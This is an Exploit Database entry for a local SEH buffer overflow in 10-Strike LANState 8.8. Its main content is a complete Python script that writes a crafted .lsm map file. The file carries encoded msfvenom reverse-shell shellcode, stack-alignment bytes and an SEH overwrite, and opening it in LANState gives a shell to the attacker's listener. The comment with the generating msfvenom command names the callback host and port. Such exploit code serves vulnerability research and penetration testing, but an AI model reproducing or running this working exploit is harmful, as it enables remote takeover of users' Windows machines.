10-Strike LANState 8.8 – Local Buffer Overflow (SEH)

• Exploit Database
• 15 阅读

• 作者： absolomb
  日期： 2018-07-25
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/45086/

• # Exploit Title: 10-Strike LANState 8.8 - Local Buffer Overflow (SEH)
  # Date: 2018-07-24
  # Exploit Author: absolomb
  # Vendor Homepage: https://www.10-strike.com/products.shtml
  # Software Link: https://www.10-strike.com/lanstate/download.shtml
  # Version 8.8
  # Tested on: Windows 7 SP 1 x86
  
  # Open LANState, File -> Open, browse to generated lsm file, boom shell.
  # If it doesn't work first try, close the tab at the bottom and reopen the file 
  
  #!/usr/bin/python
  
  lsm = """[VERSION INFO]
  PROG_NAME=LANState
  PROG_VER=8.85
  MAP_VER=8.3
  MAPID=584636991
  
  [OBJECT#4]
  index=4
  ObjName=
  ObjCaption={0}
  ObjHint=
  ObjLink=
  POS_X=100
  POS_Y=0
  Width=65
  Height=65
  ImageWidth=31
  ImageHeight=32
  StdImageIndex=1
  ImageFilePath=
  FontName=Arial
  FontColor=0
  FontSize=8
  FontCharset=1
  FontStyle=0
  TextAlignment=2
  TextLayout=0
  ObjType=1
  OBJ_ID=1
  TYPE_ID=2
  IP=
  REMOTE_NAME=A
  MAP_NAME=
  MAC_ADDR=
  OS=
  SNMPAgent=0
  SNMPVer=1
  SNMPUname=
  SNMPPassw=
  SNMPPrivPassw=
  SNMPSecLevel=0
  SNMPAuthType=0
  SNMPPrivType=0
  Community=
  ALWAYS_ON=0
  ImageEnabled=0
  ImageFile=
  IPList=
  CurrentUser=
  DESCRIPT=
  CheckInterval=60
  DownTime1=0
  DownTime1Start=12:00:00 AM
  DownTime1Finish=12:00:00 AM
  DownTime2=0
  DownTime2Start=12:00:00 AM
  DownTime2Finish=12:00:00 AM
  DownTime3=0
  DownTime3Start=12:00:00 AM
  DownTime3Finish=12:00:00 AM
  DownTime4=0
  DownTime4Start=12:00:00 AM
  DownTime4Finish=12:00:00 AM
  DownTime5=0
  DownTime5Start=12:00:00 AM
  DownTime5Finish=12:00:00 AM
  DownTime6=0
  DownTime6Start=12:00:00 AM
  DownTime6Finish=12:00:00 AM
  DownTime7=0
  DownTime7Start=12:00:00 AM
  DownTime7Finish=12:00:00 AM
  DTDoNotAlert=1
  RunFirstOnly=0
  FirstIsPassed=1
  CHECK#0/HostAddr={0}
  CHECK#0/CID=1
  CHECK#0/NumRetries=1
  CHECK#0/RetInterval=30
  CHECK#0/IsMainCheck=0
  CHECK#0/KeepStat=1
  CHECK#0/CheckType=0
  CHECK#0/CheckOn=1
  CHECK#0/CheckRTTime=0
  CHECK#0/RTTime=1000
  CHECK#0/PacketsCount=4
  CHECK#0/TimeOut=500
  CHECK#0/SizeBuf=32
  
  [VIEW]
  FonImage=0
  FonImageFile=
  ImagePosition=0
  ImageOffsetX=16
  ImageOffsetY=16
  ImgW=0
  ImgH=0
  ImgAutoSize=1
  ScaleFactor=1
  ScrollX=0
  ScrollY=0
  BkGroundColor=16777215
  FontName=Arial
  FontColor=-16777208
  FontSize=8
  FontCharset=1
  FontStyle=0
  Gradient=0
  Color1=15780518
  Color2=16777215
  WebUseSmallIcons=0
  CurIconSize=32
  LockAreas=0
  LockLines=0
  LockHosts=0
  WindowState=2
  WindowTop=-10
  WindowsLeft=12
  WindowWidth=800
  WindowsHeight=600
  
  """
  
  # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode
  shellcode =""
  shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
  shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
  shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
  shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
  shellcode += "\x42\x75\x4a\x49\x49\x6c\x6b\x58\x4f\x72\x57\x70"
  shellcode += "\x47\x70\x77\x70\x75\x30\x6c\x49\x69\x75\x45\x61"
  shellcode += "\x4b\x70\x71\x74\x4c\x4b\x62\x70\x64\x70\x4e\x6b"
  shellcode += "\x62\x72\x54\x4c\x6e\x6b\x71\x42\x65\x44\x4c\x4b"
  shellcode += "\x70\x72\x34\x68\x64\x4f\x4d\x67\x62\x6a\x76\x46"
  shellcode += "\x56\x51\x79\x6f\x6e\x4c\x65\x6c\x75\x31\x71\x6c"
  shellcode += "\x44\x42\x74\x6c\x61\x30\x59\x51\x7a\x6f\x64\x4d"
  shellcode += "\x47\x71\x58\x47\x49\x72\x6a\x52\x66\x32\x62\x77"
  shellcode += "\x6e\x6b\x50\x52\x56\x70\x6e\x6b\x53\x7a\x77\x4c"
  shellcode += "\x4c\x4b\x50\x4c\x46\x71\x73\x48\x38\x63\x62\x68"
  shellcode += "\x37\x71\x78\x51\x30\x51\x6e\x6b\x73\x69\x75\x70"
  shellcode += "\x67\x71\x78\x53\x4e\x6b\x77\x39\x64\x58\x68\x63"
  shellcode += "\x75\x6a\x37\x39\x4c\x4b\x55\x64\x4e\x6b\x35\x51"
  shellcode += "\x6a\x76\x74\x71\x6b\x4f\x6c\x6c\x6f\x31\x7a\x6f"
  shellcode += "\x56\x6d\x75\x51\x4a\x67\x75\x68\x4d\x30\x30\x75"
  shellcode += "\x78\x76\x43\x33\x53\x4d\x68\x78\x37\x4b\x61\x6d"
  shellcode += "\x65\x74\x44\x35\x4a\x44\x30\x58\x4c\x4b\x62\x78"
  shellcode += "\x31\x34\x35\x51\x4b\x63\x31\x76\x6c\x4b\x46\x6c"
  shellcode += "\x72\x6b\x6e\x6b\x66\x38\x35\x4c\x35\x51\x6b\x63"
  shellcode += "\x6c\x4b\x74\x44\x6c\x4b\x53\x31\x78\x50\x6e\x69"
  shellcode += "\x73\x74\x44\x64\x35\x74\x43\x6b\x63\x6b\x51\x71"
  shellcode += "\x32\x79\x50\x5a\x73\x61\x79\x6f\x79\x70\x31\x4f"
  shellcode += "\x33\x6f\x51\x4a\x6e\x6b\x45\x42\x7a\x4b\x4c\x4d"
  shellcode += "\x43\x6d\x73\x58\x57\x43\x67\x42\x55\x50\x43\x30"
  shellcode += "\x51\x78\x42\x57\x42\x53\x66\x52\x71\x4f\x66\x34"
  shellcode += "\x45\x38\x72\x6c\x73\x47\x57\x56\x37\x77\x49\x6f"
  shellcode += "\x7a\x75\x68\x38\x7a\x30\x43\x31\x43\x30\x33\x30"
  shellcode += "\x36\x49\x4a\x64\x73\x64\x62\x70\x30\x68\x44\x69"
  shellcode += "\x4d\x50\x30\x6b\x37\x70\x69\x6f\x59\x45\x62\x70"
  shellcode += "\x42\x70\x76\x30\x30\x50\x61\x50\x62\x70\x57\x30"
  shellcode += "\x46\x30\x51\x78\x78\x6a\x54\x4f\x49\x4f\x6b\x50"
  shellcode += "\x6b\x4f\x4a\x75\x4a\x37\x53\x5a\x57\x75\x42\x48"
  shellcode += "\x39\x50\x69\x38\x36\x4f\x4b\x30\x50\x68\x34\x42"
  shellcode += "\x65\x50\x65\x51\x4d\x6b\x6c\x49\x39\x76\x33\x5a"
  shellcode += "\x36\x70\x72\x76\x76\x37\x31\x78\x7a\x39\x4d\x75"
  shellcode += "\x52\x54\x61\x71\x59\x6f\x79\x45\x6b\x35\x39\x50"
  shellcode += "\x62\x54\x34\x4c\x39\x6f\x50\x4e\x77\x78\x62\x55"
  shellcode += "\x78\x6c\x53\x58\x48\x70\x4c\x75\x39\x32\x76\x36"
  shellcode += "\x59\x6f\x58\x55\x70\x68\x53\x53\x52\x4d\x62\x44"
  shellcode += "\x43\x30\x4e\x69\x6a\x43\x71\x47\x71\x47\x61\x47"
  shellcode += "\x64\x71\x39\x66\x50\x6a\x34\x52\x33\x69\x42\x76"
  shellcode += "\x38\x62\x4b\x4d\x51\x76\x4a\x67\x51\x54\x75\x74"
  shellcode += "\x47\x4c\x56\x61\x46\x61\x6c\x4d\x37\x34\x57\x54"
  shellcode += "\x54\x50\x7a\x66\x65\x50\x42\x64\x50\x54\x52\x70"
  shellcode += "\x73\x66\x71\x46\x31\x46\x37\x36\x32\x76\x42\x6e"
  shellcode += "\x33\x66\x71\x46\x62\x73\x61\x46\x32\x48\x50\x79"
  shellcode += "\x38\x4c\x45\x6f\x4d\x56\x6b\x4f\x79\x45\x4f\x79"
  shellcode += "\x49\x70\x52\x6e\x62\x76\x37\x36\x4b\x4f\x34\x70"
  shellcode += "\x65\x38\x57\x78\x6e\x67\x65\x4d\x35\x30\x69\x6f"
  shellcode += "\x58\x55\x4d\x6b\x5a\x50\x4f\x45\x69\x32\x33\x66"
  shellcode += "\x42\x48\x6d\x76\x6c\x55\x4d\x6d\x4f\x6d\x49\x6f"
  shellcode += "\x4a\x75\x75\x6c\x43\x36\x63\x4c\x67\x7a\x6f\x70"
  shellcode += "\x6b\x4b\x6b\x50\x43\x45\x56\x65\x6f\x4b\x43\x77"
  shellcode += "\x62\x33\x73\x42\x72\x4f\x33\x5a\x55\x50\x63\x63"
  shellcode += "\x79\x6f\x6e\x35\x41\x41"
  
  align_stack ='\x58' #POP EAX
  align_stack += '\x58' #POP EAX
  align_stack += '\x05\x61\x55\x55\x55' #ADD EAX,55555561
  align_stack += '\x05\x61\x55\x55\x55' #ADD EAX,55555561
  align_stack += '\x05\x62\x56\x55\x55' #ADD EAX,55555662
  align_stack += '\x50' #PUSH EAX
  align_stack += '\x5f' #POP EDI
  
  # JMP always true
  nseh = '\x71\x06\x70\x04'
  
  #01BA7647 POP POP RET LANState.exe
  seh = '\x47\x76\xba\x01'
  
  payload = '\x41' * 235
  payload += nseh
  payload += seh
  payload += align_stack
  payload += '\x41' * 265
  payload += shellcode
  payload += '\x41' * (3492 -len(shellcode + align_stack))
  
  buffer = lsm.format(payload)
  
  file = open('sploit.lsm','w')
  print "Size: " + str(len(payload)) + " bytes"
  file.write(buffer)
  file.close()
  print "Map file created!"